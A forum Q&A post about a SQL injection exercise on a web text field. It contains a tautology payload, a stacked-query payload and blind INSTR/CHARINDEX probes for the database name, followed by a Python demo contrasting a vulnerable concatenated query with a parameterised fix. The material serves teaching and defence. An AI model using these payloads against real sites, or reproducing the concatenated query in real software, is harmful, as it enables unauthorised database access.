SQL Injection - MYSQL

Published 2019-07-21 03:49

Question:

I'm doing an exercise on the SQL Injection, the query is given. The data comes in between ''. So this is the query:

select * from contacts where name = ''

I managed to see the users in the table using this:

select * from contacts where name = 'anything' or 1='1'

But my question is: how can I write it so that I can write a new query? Or see the database name, for example, so that I can check other tables.

EDIT:

To avoid confusion: the query is not given to us. There is a text field on a webpage, and that's what we use to do the SQL injection.

So imagine the query is this:

select * from contacts where name = ''

And I wrote this to the text field, to see all the users.

anything' or 1='1

I'm trying to understand how I can use this textfield, to see the name of the database, or run other queries.

Thank you.

Answer 1:

So if the query is:

select * from contacts where name = ''

You can try something like:

'; select * from anotherTableName'


Answer 2:

If your data does not return multi-result sets, then you can do something like:

In SQL Server

SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=1
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=2
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=3
...

Until you get all the correct indexes of the characters in the name.

In MySQL it would be something like:

SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =1
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =2
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =3
...
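The exercise in the question, and the two answers above, all rely on the text-field value being spliced into the SQL string. The following is an added example (not code from the question or the answers) that builds the `contacts` lookup both ways: by string concatenation, which is the form the exercise describes, and with a bound parameter, which is the fix. Python's built-in sqlite3 stands in for MySQL so it runs offline; the table rows are constructed for the example, and the tautology payload is a constructed text comparison (`'a'='a'`) because SQLite, unlike MySQL, does not evaluate the question's `1='1'` as true (it compares an integer literal and a text literal without conversion). The stacked-query payload is the one posted in Answer 1.

```python
# Added example, not from the original post: the text-field scenario run against
# a concatenated query (vulnerable) and a parameterised query (hardened).
# sqlite3 stands in for MySQL so this runs offline.
import sqlite3

# Constructed rows standing in for the exercise's `contacts` table.
SAMPLE_ROWS = [("alice",), ("bob",), ("carol",)]

# Constructed tautology payload. The question's MySQL payload `anything' or 1='1`
# evaluates false in SQLite (integer literal vs text literal), so a text
# comparison is used here to show the same effect.
TAUTOLOGY_PAYLOAD = "anything' or 'a'='a"

# Stacked-query payload exactly as posted in Answer 1.
STACKED_PAYLOAD = "'; select * from anotherTableName'"


def make_db():
    """In-memory database holding the constructed contacts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contacts (name TEXT)")
    conn.executemany("INSERT INTO contacts VALUES (?)", SAMPLE_ROWS)
    return conn


def lookup_concat(conn, user_input):
    """Vulnerable form: the text-field value is spliced into the SQL text, so a
    quote in the input closes the literal and whatever follows is parsed as SQL."""
    sql = "select * from contacts where name = '" + user_input + "'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # sqlite3, like most MySQL connectors in their default configuration,
        # executes one statement per call, so a stacked query is refused before
        # it runs. That is a useful limit, not a substitute for parameters.
        return "rejected by driver"


def lookup_param(conn, user_input):
    """Hardened form: the value is bound as a parameter. The driver never parses
    it as SQL, so quotes, OR and semicolons are just characters of a name."""
    sql = "select * from contacts where name = ?"
    return [row[0] for row in conn.execute(sql, (user_input,))]


def demo():
    """Run both forms against the two payloads and a legitimate name."""
    conn = make_db()
    return {
        "concat_tautology": lookup_concat(conn, TAUTOLOGY_PAYLOAD),
        "concat_stacked": lookup_concat(conn, STACKED_PAYLOAD),
        "param_tautology": lookup_param(conn, TAUTOLOGY_PAYLOAD),
        "param_stacked": lookup_param(conn, STACKED_PAYLOAD),
        "param_legit": lookup_param(conn, "bob"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:17} -> {result}")
```

Run as a script, the concatenated lookup returns every row for the tautology payload and is refused by the driver for the stacked payload, while the parameterised lookup returns nothing for either payload and exactly one row for a real name. The same parameter binding neutralises the character-by-character `INSTR(DATABASE(), ...)` probing in Answer 2, because the `OR` never reaches the SQL parser.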